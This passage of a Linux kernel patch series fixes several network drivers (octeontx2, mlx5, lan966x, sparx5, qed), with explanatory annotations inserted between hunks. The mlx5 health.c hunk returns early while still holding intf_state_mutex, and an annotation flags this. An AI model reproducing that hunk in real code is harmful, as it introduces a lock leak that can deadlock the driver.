+ 			 dma_unmap_len(tx_buf, len), DMA_TO_DEVICE);
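/* Annotation, not part of the patch: on this cleanup path raw_buf points
 * at a page fragment rather than a struct xdp_frame, so casting it for
 * xdp_return_frame() freed through the wrong object.  The matching pair
 * is (illustrative only):
 *
 *   buf = page_frag_alloc(&cache, size, GFP_ATOMIC);
 *   ...
 *   page_frag_free(buf);   // counterpart of page_frag_alloc()
 */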
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+index 9e10e7471b887..88f8772a61cd5 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+@@ -1012,6 +1012,7 @@ static void otx2_pool_refill_task(struct work_struct *work)
+ 	rbpool = cq->rbpool;
+ 	free_ptrs = cq->pool_ptrs;
+ 
++	get_cpu();
+ 	while (cq->pool_ptrs) {
+ 		if (otx2_alloc_rbuf(pfvf, rbpool, &bufptr)) {
+ 			/* Schedule a WQ if we fails to free atleast half of the
+@@ -1031,6 +1032,7 @@ static void otx2_pool_refill_task(struct work_struct *work)
+ 		pfvf->hw_ops->aura_freeptr(pfvf, qidx, bufptr + OTX2_HEAD_ROOM);
+ 		cq->pool_ptrs--;
+ 	}
++	put_cpu();
+ 	cq->refill_task_sched = false;
+ }
+ 
+@@ -1368,6 +1370,7 @@ int otx2_sq_aura_pool_init(struct otx2_nic *pfvf)
+ 	if (err)
+ 		goto fail;
+ 
++	get_cpu();
+ 	/* Allocate pointers and free them to aura/pool */
+ 	for (qidx = 0; qidx < hw->tot_tx_queues; qidx++) {
+ 		pool_id = otx2_get_pool_idx(pfvf, AURA_NIX_SQ, qidx);
+@@ -1376,18 +1379,24 @@ int otx2_sq_aura_pool_init(struct otx2_nic *pfvf)
+ 		sq = &qset->sq[qidx];
+ 		sq->sqb_count = 0;
+ 		sq->sqb_ptrs = kcalloc(num_sqbs, sizeof(*sq->sqb_ptrs), GFP_KERNEL);
+-		if (!sq->sqb_ptrs)
+-			return -ENOMEM;
++		if (!sq->sqb_ptrs) {
++			err = -ENOMEM;
++			goto err_mem;
++		}
+ 
+ 		for (ptr = 0; ptr < num_sqbs; ptr++) {
+-			if (otx2_alloc_rbuf(pfvf, pool, &bufptr))
+-				return -ENOMEM;
++			err = otx2_alloc_rbuf(pfvf, pool, &bufptr);
++			if (err)
++				goto err_mem;
+ 			pfvf->hw_ops->aura_freeptr(pfvf, pool_id, bufptr);
+ 			sq->sqb_ptrs[sq->sqb_count++] = (u64)bufptr;
+ 		}
+ 	}
+ 
+-	return 0;
++err_mem:
++	put_cpu();
++	return err ? -ENOMEM : 0;
++
+ fail:
+ 	otx2_mbox_reset(&pfvf->mbox.mbox, 0);
+ 	otx2_aura_pool_free(pfvf);
+@@ -1426,18 +1435,21 @@ int otx2_rq_aura_pool_init(struct otx2_nic *pfvf)
+ 	if (err)
+ 		goto fail;
+ 
++	get_cpu();
+ 	/* Allocate pointers and free them to aura/pool */
+ 	for (pool_id = 0; pool_id < hw->rqpool_cnt; pool_id++) {
+ 		pool = &pfvf->qset.pool[pool_id];
+ 		for (ptr = 0; ptr < num_ptrs; ptr++) {
+-			if (otx2_alloc_rbuf(pfvf, pool, &bufptr))
+-				return -ENOMEM;
++			err = otx2_alloc_rbuf(pfvf, pool, &bufptr);
++			if (err)
++				goto err_mem;
+ 			pfvf->hw_ops->aura_freeptr(pfvf, pool_id,
+ 						   bufptr + OTX2_HEAD_ROOM);
+ 		}
+ 	}
+-
+-	return 0;
++err_mem:
++	put_cpu();
++	return err ? -ENOMEM : 0;
+ fail:
+ 	otx2_mbox_reset(&pfvf->mbox.mbox, 0);
+ 	otx2_aura_pool_free(pfvf);
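/* Annotation, not part of the patch: the freed pointers are pushed
 * through per-CPU state (hw_ops->aura_freeptr), so the loops above now
 * pin the task with get_cpu()/put_cpu(), and the new error paths drop
 * the pin before returning.  Generic pattern (assumes <linux/smp.h>):
 */
static void percpu_section_sketch(void)
{
	int cpu = get_cpu();	/* disables preemption */

	/* per-CPU work that must not migrate between CPUs goes here */
	pr_debug("pinned on cpu %d\n", cpu);

	put_cpu();		/* re-enables preemption */
}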
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/devlink.c b/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
+index 66c6a7017695d..97e9ec44a759b 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
+@@ -468,7 +468,7 @@ static int mlx5_devlink_enable_roce_validate(struct devlink *devlink, u32 id,
+ 	bool new_state = val.vbool;
+ 
+ 	if (new_state && !MLX5_CAP_GEN(dev, roce) &&
+-	    !MLX5_CAP_GEN(dev, roce_rw_supported)) {
++	    !(MLX5_CAP_GEN(dev, roce_rw_supported) && MLX5_CAP_GEN_MAX(dev, roce))) {
+ 		NL_SET_ERR_MSG_MOD(extack, "Device doesn't support RoCE");
+ 		return -EOPNOTSUPP;
+ 	}
+@@ -563,7 +563,7 @@ static int mlx5_devlink_eq_depth_validate(struct devlink *devlink, u32 id,
+ 					  union devlink_param_value val,
+ 					  struct netlink_ext_ack *extack)
+ {
+-	return (val.vu16 >= 64 && val.vu16 <= 4096) ? 0 : -EINVAL;
++	return (val.vu32 >= 64 && val.vu32 <= 4096) ? 0 : -EINVAL;
+ }
+ 
+ static const struct devlink_param mlx5_devlink_params[] = {
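/* Annotation, not part of the patch: the EQ-depth parameters are
 * registered as DEVLINK_PARAM_TYPE_U32, so the validator must read the
 * matching member of the value union, which is roughly:
 *
 *   union devlink_param_value {
 *           u8 vu8; u16 vu16; u32 vu32;
 *           char vstr[__DEVLINK_PARAM_MAX_STRING_VALUE];
 *           bool vbool;
 *   };
 *
 * Reading val.vu16 inspected only half of the u32 the user supplied.
 */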
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_rx.c b/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_rx.c
+index 5f6f95ad6888c..1ae15b8536a85 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_rx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_rx.c
+@@ -459,7 +459,11 @@ static int mlx5e_rx_reporter_diagnose(struct devlink_health_reporter *reporter,
+ 		goto unlock;
+ 
+ 	for (i = 0; i < priv->channels.num; i++) {
+-		struct mlx5e_rq *rq = &priv->channels.c[i]->rq;
++		struct mlx5e_channel *c = priv->channels.c[i];
++		struct mlx5e_rq *rq;
++
++		rq = test_bit(MLX5E_CHANNEL_STATE_XSK, c->state) ?
++			&c->xskrq : &c->rq;
+ 
+ 		err = mlx5e_rx_reporter_build_diagnose_output(rq, fmsg);
+ 		if (err)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_ct.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_ct.c
+index 864ce0c393e61..f01f7dfdbcf88 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_ct.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_ct.c
+@@ -2080,14 +2080,9 @@ out_err:
+ static void
+ mlx5_ct_tc_create_dbgfs(struct mlx5_tc_ct_priv *ct_priv)
+ {
+-	bool is_fdb = ct_priv->ns_type == MLX5_FLOW_NAMESPACE_FDB;
+ 	struct mlx5_tc_ct_debugfs *ct_dbgfs = &ct_priv->debugfs;
+-	char dirname[16] = {};
+ 
+-	if (sscanf(dirname, "ct_%s", is_fdb ? "fdb" : "nic") < 0)
+-		return;
+-
+-	ct_dbgfs->root = debugfs_create_dir(dirname, mlx5_debugfs_get_dev_root(ct_priv->dev));
++	ct_dbgfs->root = debugfs_create_dir("ct", mlx5_debugfs_get_dev_root(ct_priv->dev));
+ 	debugfs_create_atomic_t("offloaded", 0400, ct_dbgfs->root,
+ 				&ct_dbgfs->stats.offloaded);
+ 	debugfs_create_atomic_t("rx_dropped", 0400, ct_dbgfs->root,
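/* Annotation, not part of the patch: the removed code scanned *from* the
 * empty dirname[] with sscanf(), so no directory name was ever produced;
 * building the name would have needed the formatting counterpart:
 *
 *   char dirname[16];
 *   snprintf(dirname, sizeof(dirname), "ct_%s", is_fdb ? "fdb" : "nic");
 *
 * The fix sidesteps the string entirely and names the directory "ct".
 */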
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
+index ff73d25bc6eb8..2aaf8ab857b8f 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_encap.c
+@@ -222,7 +222,7 @@ void mlx5e_tc_encap_flows_del(struct mlx5e_priv *priv,
+ 	int err;
+ 
+ 	list_for_each_entry(flow, flow_list, tmp_list) {
+-		if (!mlx5e_is_offloaded_flow(flow) || flow_flag_test(flow, SLOW))
++		if (!mlx5e_is_offloaded_flow(flow))
+ 			continue;
+ 
+ 		attr = mlx5e_tc_get_encap_attr(flow);
+@@ -231,6 +231,13 @@ void mlx5e_tc_encap_flows_del(struct mlx5e_priv *priv,
+ 		esw_attr->dests[flow->tmp_entry_index].flags &= ~MLX5_ESW_DEST_ENCAP_VALID;
+ 		esw_attr->dests[flow->tmp_entry_index].pkt_reformat = NULL;
+ 
++		/* Clear pkt_reformat before checking slow path flag. Because
++		 * in next iteration, the same flow is already set slow path
++		 * flag, but still need to clear the pkt_reformat.
++		 */
++		if (flow_flag_test(flow, SLOW))
++			continue;
++
+ 		/* update from encap rule to slow path rule */
+ 		spec = &flow->attr->parse_attr->spec;
+ 		rule = mlx5e_tc_offload_to_slow_path(esw, flow, spec);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_geneve.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_geneve.c
+index f5b26f5a7de46..054d80c4e65cf 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_geneve.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun_geneve.c
+@@ -273,6 +273,11 @@ static int mlx5e_tc_tun_parse_geneve_options(struct mlx5e_priv *priv,
+ 		 geneve_tlv_option_0_data, be32_to_cpu(opt_data_key));
+ 	MLX5_SET(fte_match_set_misc3, misc_3_c,
+ 		 geneve_tlv_option_0_data, be32_to_cpu(opt_data_mask));
++	if (MLX5_CAP_ESW_FLOWTABLE_FDB(priv->mdev,
++				       ft_field_support.geneve_tlv_option_0_exist)) {
++		MLX5_SET_TO_ONES(fte_match_set_misc, misc_c, geneve_tlv_option_0_exist);
++		MLX5_SET_TO_ONES(fte_match_set_misc, misc_v, geneve_tlv_option_0_exist);
++	}
+ 
+ 	spec->match_criteria_enable |= MLX5_MATCH_MISC_PARAMETERS_3;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 5e41dfdf79c80..951ede4338132 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -1298,7 +1298,7 @@ static int mlx5e_alloc_xdpsq(struct mlx5e_channel *c,
+ 	sq->channel   = c;
+ 	sq->uar_map   = mdev->mlx5e_res.hw_objs.bfreg.map;
+ 	sq->min_inline_mode = params->tx_min_inline_mode;
+-	sq->hw_mtu    = MLX5E_SW2HW_MTU(params, params->sw_mtu);
++	sq->hw_mtu    = MLX5E_SW2HW_MTU(params, params->sw_mtu) - ETH_FCS_LEN;
+ 	sq->xsk_pool  = xsk_pool;
+ 
+ 	sq->stats = sq->xsk_pool ?
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/egress_lgcy.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/egress_lgcy.c
+index 60a73990017c2..6b4c9ffad95b2 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/egress_lgcy.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/egress_lgcy.c
+@@ -67,6 +67,7 @@ static void esw_acl_egress_lgcy_groups_destroy(struct mlx5_vport *vport)
+ int esw_acl_egress_lgcy_setup(struct mlx5_eswitch *esw,
+ 			      struct mlx5_vport *vport)
+ {
++	bool vst_mode_steering = esw_vst_mode_is_steering(esw);
+ 	struct mlx5_flow_destination drop_ctr_dst = {};
+ 	struct mlx5_flow_destination *dst = NULL;
+ 	struct mlx5_fc *drop_counter = NULL;
+@@ -77,6 +78,7 @@ int esw_acl_egress_lgcy_setup(struct mlx5_eswitch *esw,
+ 	 */
+ 	int table_size = 2;
+ 	int dest_num = 0;
++	int actions_flag;
+ 	int err = 0;
+ 
+ 	if (vport->egress.legacy.drop_counter) {
+@@ -119,8 +121,11 @@ int esw_acl_egress_lgcy_setup(struct mlx5_eswitch *esw,
+ 		  vport->vport, vport->info.vlan, vport->info.qos);
+ 
+ 	/* Allowed vlan rule */
++	actions_flag = MLX5_FLOW_CONTEXT_ACTION_ALLOW;
++	if (vst_mode_steering)
++		actions_flag |= MLX5_FLOW_CONTEXT_ACTION_VLAN_POP;
+ 	err = esw_egress_acl_vlan_create(esw, vport, NULL, vport->info.vlan,
+-					 MLX5_FLOW_CONTEXT_ACTION_ALLOW);
++					 actions_flag);
+ 	if (err)
+ 		goto out;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_lgcy.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_lgcy.c
+index b1a5199260f69..093ed86a0acd8 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_lgcy.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_lgcy.c
+@@ -139,11 +139,14 @@ static void esw_acl_ingress_lgcy_groups_destroy(struct mlx5_vport *vport)
+ int esw_acl_ingress_lgcy_setup(struct mlx5_eswitch *esw,
+ 			       struct mlx5_vport *vport)
+ {
++	bool vst_mode_steering = esw_vst_mode_is_steering(esw);
+ 	struct mlx5_flow_destination drop_ctr_dst = {};
+ 	struct mlx5_flow_destination *dst = NULL;
+ 	struct mlx5_flow_act flow_act = {};
+ 	struct mlx5_flow_spec *spec = NULL;
+ 	struct mlx5_fc *counter = NULL;
++	bool vst_check_cvlan = false;
++	bool vst_push_cvlan = false;
+ 	/* The ingress acl table contains 4 groups
+ 	 * (2 active rules at the same time -
+ 	 *      1 allow rule from one of the first 3 groups.
+@@ -203,7 +206,26 @@ int esw_acl_ingress_lgcy_setup(struct mlx5_eswitch *esw,
+ 		goto out;
+ 	}
+ 
+-	if (vport->info.vlan || vport->info.qos)
++	if ((vport->info.vlan || vport->info.qos)) {
++		if (vst_mode_steering)
++			vst_push_cvlan = true;
++		else if (!MLX5_CAP_ESW(esw->dev, vport_cvlan_insert_always))
++			vst_check_cvlan = true;
++	}
++
++	if (vst_check_cvlan || vport->info.spoofchk)
++		spec->match_criteria_enable = MLX5_MATCH_OUTER_HEADERS;
++
++	/* Create ingress allow rule */
++	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_ALLOW;
++	if (vst_push_cvlan) {
++		flow_act.action |= MLX5_FLOW_CONTEXT_ACTION_VLAN_PUSH;
++		flow_act.vlan[0].prio = vport->info.qos;
++		flow_act.vlan[0].vid = vport->info.vlan;
++		flow_act.vlan[0].ethtype = ETH_P_8021Q;
++	}
++
++	if (vst_check_cvlan)
+ 		MLX5_SET_TO_ONES(fte_match_param, spec->match_criteria,
+ 				 outer_headers.cvlan_tag);
+ 
+@@ -218,9 +240,6 @@ int esw_acl_ingress_lgcy_setup(struct mlx5_eswitch *esw,
+ 		ether_addr_copy(smac_v, vport->info.mac);
+ 	}
+ 
+-	/* Create ingress allow rule */
+-	spec->match_criteria_enable = MLX5_MATCH_OUTER_HEADERS;
+-	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_ALLOW;
+ 	vport->ingress.allow_rule = mlx5_add_flow_rules(vport->ingress.acl, spec,
+ 							&flow_act, NULL, 0);
+ 	if (IS_ERR(vport->ingress.allow_rule)) {
+@@ -232,6 +251,9 @@ int esw_acl_ingress_lgcy_setup(struct mlx5_eswitch *esw,
+ 		goto out;
+ 	}
+ 
++	if (!vst_check_cvlan && !vport->info.spoofchk)
++		goto out;
++
+ 	memset(&flow_act, 0, sizeof(flow_act));
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_DROP;
+ 	/* Attach drop flow counter */
+@@ -257,7 +279,8 @@ int esw_acl_ingress_lgcy_setup(struct mlx5_eswitch *esw,
+ 	return 0;
+ 
+ out:
+-	esw_acl_ingress_lgcy_cleanup(esw, vport);
++	if (err)
++		esw_acl_ingress_lgcy_cleanup(esw, vport);
+ 	kvfree(spec);
+ 	return err;
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+index 374e3fbdc2cf2..788a6ab5c4636 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+@@ -161,10 +161,17 @@ static int modify_esw_vport_cvlan(struct mlx5_core_dev *dev, u16 vport,
+ 			 esw_vport_context.vport_cvlan_strip, 1);
+ 
+ 	if (set_flags & SET_VLAN_INSERT) {
+-		/* insert only if no vlan in packet */
+-		MLX5_SET(modify_esw_vport_context_in, in,
+-			 esw_vport_context.vport_cvlan_insert, 1);
+-
++		if (MLX5_CAP_ESW(dev, vport_cvlan_insert_always)) {
++			/* insert either if vlan exist in packet or not */
++			MLX5_SET(modify_esw_vport_context_in, in,
++				 esw_vport_context.vport_cvlan_insert,
++				 MLX5_VPORT_CVLAN_INSERT_ALWAYS);
++		} else {
++			/* insert only if no vlan in packet */
++			MLX5_SET(modify_esw_vport_context_in, in,
++				 esw_vport_context.vport_cvlan_insert,
++				 MLX5_VPORT_CVLAN_INSERT_WHEN_NO_CVLAN);
++		}
+ 		MLX5_SET(modify_esw_vport_context_in, in,
+ 			 esw_vport_context.cvlan_pcp, qos);
+ 		MLX5_SET(modify_esw_vport_context_in, in,
+@@ -774,6 +781,7 @@ static void esw_vport_cleanup_acl(struct mlx5_eswitch *esw,
+ 
+ static int esw_vport_setup(struct mlx5_eswitch *esw, struct mlx5_vport *vport)
+ {
++	bool vst_mode_steering = esw_vst_mode_is_steering(esw);
+ 	u16 vport_num = vport->vport;
+ 	int flags;
+ 	int err;
+@@ -800,8 +808,9 @@ static int esw_vport_setup(struct mlx5_eswitch *esw, struct mlx5_vport *vport)
+ 
+ 	flags = (vport->info.vlan || vport->info.qos) ?
+ 		SET_VLAN_STRIP | SET_VLAN_INSERT : 0;
+-	modify_esw_vport_cvlan(esw->dev, vport_num, vport->info.vlan,
+-			       vport->info.qos, flags);
++	if (esw->mode == MLX5_ESWITCH_OFFLOADS || !vst_mode_steering)
++		modify_esw_vport_cvlan(esw->dev, vport_num, vport->info.vlan,
++				       vport->info.qos, flags);
+ 
+ 	return 0;
+ }
+@@ -1805,6 +1814,7 @@ int __mlx5_eswitch_set_vport_vlan(struct mlx5_eswitch *esw,
+ 				  u16 vport, u16 vlan, u8 qos, u8 set_flags)
+ {
+ 	struct mlx5_vport *evport = mlx5_eswitch_get_vport(esw, vport);
++	bool vst_mode_steering = esw_vst_mode_is_steering(esw);
+ 	int err = 0;
+ 
+ 	if (IS_ERR(evport))
+@@ -1812,9 +1822,11 @@ int __mlx5_eswitch_set_vport_vlan(struct mlx5_eswitch *esw,
+ 	if (vlan > 4095 || qos > 7)
+ 		return -EINVAL;
+ 
+-	err = modify_esw_vport_cvlan(esw->dev, vport, vlan, qos, set_flags);
+-	if (err)
+-		return err;
++	if (esw->mode == MLX5_ESWITCH_OFFLOADS || !vst_mode_steering) {
++		err = modify_esw_vport_cvlan(esw->dev, vport, vlan, qos, set_flags);
++		if (err)
++			return err;
++	}
+ 
+ 	evport->info.vlan = vlan;
+ 	evport->info.qos = qos;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+index 3029bc1c0dd04..5db76af35d3f5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+@@ -518,6 +518,12 @@ int mlx5_eswitch_del_vlan_action(struct mlx5_eswitch *esw,
+ int __mlx5_eswitch_set_vport_vlan(struct mlx5_eswitch *esw,
+ 				  u16 vport, u16 vlan, u8 qos, u8 set_flags);
+ 
++static inline bool esw_vst_mode_is_steering(struct mlx5_eswitch *esw)
++{
++	return (MLX5_CAP_ESW_EGRESS_ACL(esw->dev, pop_vlan) &&
++		MLX5_CAP_ESW_INGRESS_ACL(esw->dev, push_vlan));
++}
++
+ static inline bool mlx5_eswitch_vlan_actions_supported(struct mlx5_core_dev *dev,
+ 						       u8 vlan_depth)
+ {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/health.c b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+index 86ed87d704f7d..96417c5feed76 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/health.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+@@ -674,6 +674,12 @@ static void mlx5_fw_fatal_reporter_err_work(struct work_struct *work)
+ 	dev = container_of(priv, struct mlx5_core_dev, priv);
+ 	devlink = priv_to_devlink(dev);
+ 
++	mutex_lock(&dev->intf_state_mutex);
++	if (test_bit(MLX5_DROP_NEW_HEALTH_WORK, &health->flags)) {
++		mlx5_core_err(dev, "health works are not permitted at this stage\n");
++		return;
++	}
++	mutex_unlock(&dev->intf_state_mutex);
+ 	enter_error_state(dev, false);
+ 	if (IS_ERR_OR_NULL(health->fw_fatal_reporter)) {
+ 		devl_lock(devlink);
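/* Annotation, not part of the patch: note that the early return above
 * exits with intf_state_mutex still held; a lock-balanced form would be:
 *
 *   mutex_lock(&dev->intf_state_mutex);
 *   if (test_bit(MLX5_DROP_NEW_HEALTH_WORK, &health->flags)) {
 *           mlx5_core_err(dev, "health works are not permitted at this stage\n");
 *           mutex_unlock(&dev->intf_state_mutex);
 *           return;
 *   }
 *   mutex_unlock(&dev->intf_state_mutex);
 *
 * (Mainline later restored the missing unlock with a follow-up fix.)
 */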
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
+index 4e3a75496dd9a..84f5352b0ce19 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
+@@ -71,6 +71,10 @@ static void mlx5i_build_nic_params(struct mlx5_core_dev *mdev,
+ 	params->packet_merge.type = MLX5E_PACKET_MERGE_NONE;
+ 	params->hard_mtu = MLX5_IB_GRH_BYTES + MLX5_IPOIB_HARD_LEN;
+ 	params->tunneled_offload_en = false;
++
++	/* CQE compression is not supported for IPoIB */
++	params->rx_cqe_compress_def = false;
++	MLX5E_SET_PFLAG(params, MLX5E_PFLAG_RX_CQE_COMPRESS, params->rx_cqe_compress_def);
+ }
+ 
+ /* Called directly after IPoIB netdevice was created to initialize SW structs */
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c b/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
+index 32c3e0a649a75..ad32b80e85018 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
+@@ -228,6 +228,7 @@ static void mlx5_ldev_free(struct kref *ref)
+ 	if (ldev->nb.notifier_call)
+ 		unregister_netdevice_notifier_net(&init_net, &ldev->nb);
+ 	mlx5_lag_mp_cleanup(ldev);
++	cancel_delayed_work_sync(&ldev->bond_work);
+ 	destroy_workqueue(ldev->wq);
+ 	mlx5_lag_mpesw_cleanup(ldev);
+ 	mutex_destroy(&ldev->lock);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index e58775a7d955a..00758312df065 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -614,7 +614,7 @@ static int handle_hca_cap(struct mlx5_core_dev *dev, void *set_ctx)
+ 		MLX5_SET(cmd_hca_cap, set_hca_cap, num_total_dynamic_vf_msix,
+ 			 MLX5_CAP_GEN_MAX(dev, num_total_dynamic_vf_msix));
+ 
+-	if (MLX5_CAP_GEN(dev, roce_rw_supported))
++	if (MLX5_CAP_GEN(dev, roce_rw_supported) && MLX5_CAP_GEN_MAX(dev, roce))
+ 		MLX5_SET(cmd_hca_cap, set_hca_cap, roce,
+ 			 mlx5_is_roce_on(dev));
+ 
+@@ -1051,6 +1051,8 @@ err_rl_cleanup:
+ err_tables_cleanup:
+ 	mlx5_geneve_destroy(dev->geneve);
+ 	mlx5_vxlan_destroy(dev->vxlan);
++	mlx5_cleanup_clock(dev);
++	mlx5_cleanup_reserved_gids(dev);
+ 	mlx5_cq_debugfs_cleanup(dev);
+ 	mlx5_fw_reset_cleanup(dev);
+ err_events_cleanup:
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_port.c b/drivers/net/ethernet/microchip/lan966x/lan966x_port.c
+index 1a61c6cdb0779..0050fcb988b75 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_port.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_port.c
+@@ -381,7 +381,7 @@ int lan966x_port_pcs_set(struct lan966x_port *port,
+ 	}
+ 
+ 	/* Take PCS out of reset */
+-	lan_rmw(DEV_CLOCK_CFG_LINK_SPEED_SET(2) |
++	lan_rmw(DEV_CLOCK_CFG_LINK_SPEED_SET(LAN966X_SPEED_1000) |
+ 		DEV_CLOCK_CFG_PCS_RX_RST_SET(0) |
+ 		DEV_CLOCK_CFG_PCS_TX_RST_SET(0),
+ 		DEV_CLOCK_CFG_LINK_SPEED |
+diff --git a/drivers/net/ethernet/microchip/sparx5/sparx5_main.c b/drivers/net/ethernet/microchip/sparx5/sparx5_main.c
+index b6bbb3c9bd7a4..3423c95cc84ae 100644
+--- a/drivers/net/ethernet/microchip/sparx5/sparx5_main.c
++++ b/drivers/net/ethernet/microchip/sparx5/sparx5_main.c
+@@ -824,7 +824,7 @@ static int mchp_sparx5_probe(struct platform_device *pdev)
+ 	if (err)
+ 		goto cleanup_config;
+ 
+-	if (!of_get_mac_address(np, sparx5->base_mac)) {
++	if (of_get_mac_address(np, sparx5->base_mac)) {
+ 		dev_info(sparx5->dev, "MAC addr was not set, use random MAC\n");
+ 		eth_random_addr(sparx5->base_mac);
+ 		sparx5->base_mac[5] = 0;
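/* Annotation, not part of the patch: of_get_mac_address() returns 0 on
 * success and a negative errno when the DT has no usable address, so the
 * random-MAC fallback must run on a *non-zero* return, as the fix does:
 *
 *   if (of_get_mac_address(np, mac)) {      // DT lookup failed
 *           eth_random_addr(mac);           // fall back to a random MAC
 *           mac[5] = 0;                     // driver uses it as a base
 *   }
 *
 * The inverted test had the fallback overwrite a valid DT-provided MAC
 * and keep a zeroed one otherwise.
 */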
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_debug.c b/drivers/net/ethernet/qlogic/qed/qed_debug.c
+index 86ecb080b1536..cdcead614e9fa 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_debug.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_debug.c
+@@ -1832,7 +1832,8 @@ static enum dbg_status qed_find_nvram_image(struct qed_hwfn *p_hwfn,
+ 					    struct qed_ptt *p_ptt,
+ 					    u32 image_type,
+ 					    u32 *nvram_offset_bytes,
+-					    u32 *nvram_size_bytes)
++					    u32 *nvram_size_bytes,
++					    bool b_can_sleep)
+ {
+ 	u32 ret_mcp_resp, ret_mcp_param, ret_txn_size;
+ 	struct mcp_file_att file_att;
+@@ -1846,7 +1847,8 @@ static enum dbg_status qed_find_nvram_image(struct qed_hwfn *p_hwfn,
+ 					&ret_mcp_resp,
+ 					&ret_mcp_param,
+ 					&ret_txn_size,
+-					(u32 *)&file_att, false);
++					(u32 *)&file_att,
++					b_can_sleep);
+ 
+ 	/* Check response */
+ 	if (nvm_result || (ret_mcp_resp & FW_MSG_CODE_MASK) !=
+@@ -1873,7 +1875,9 @@ static enum dbg_status qed_find_nvram_image(struct qed_hwfn *p_hwfn,
+ static enum dbg_status qed_nvram_read(struct qed_hwfn *p_hwfn,
+ 				      struct qed_ptt *p_ptt,
+ 				      u32 nvram_offset_bytes,
+-				      u32 nvram_size_bytes, u32 *ret_buf)
++				      u32 nvram_size_bytes,
++				      u32 *ret_buf,
++				      bool b_can_sleep)
+ {
+ 	u32 ret_mcp_resp, ret_mcp_param, ret_read_size, bytes_to_copy;
+ 	s32 bytes_left = nvram_size_bytes;
+@@ -1899,7 +1903,7 @@ static enum dbg_status qed_nvram_read(struct qed_hwfn *p_hwfn,
+ 				       &ret_mcp_resp,
+ 				       &ret_mcp_param, &ret_read_size,
+ 				       (u32 *)((u8 *)ret_buf + read_offset),
+-				       false))
++				       b_can_sleep))
+ 			return DBG_STATUS_NVRAM_READ_FAILED;
+ 
+ 		/* Check response */
+@@ -3380,7 +3384,8 @@ static u32 qed_grc_dump_mcp_hw_dump(struct qed_hwfn *p_hwfn,
+ 				      p_ptt,
+ 				      NVM_TYPE_HW_DUMP_OUT,
+ 				      &hw_dump_offset_bytes,
